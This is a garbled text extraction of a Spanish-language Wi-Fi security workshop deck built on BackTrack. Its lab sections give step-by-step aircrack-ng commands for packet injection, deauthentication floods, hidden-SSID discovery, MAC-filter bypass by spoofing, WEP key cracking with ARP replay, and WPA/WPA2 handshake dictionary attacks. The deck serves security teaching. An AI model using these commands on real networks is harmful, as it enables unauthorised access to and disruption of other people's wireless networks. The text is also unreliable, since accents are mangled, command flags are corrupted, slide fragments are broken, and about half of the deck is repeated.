bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 16: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

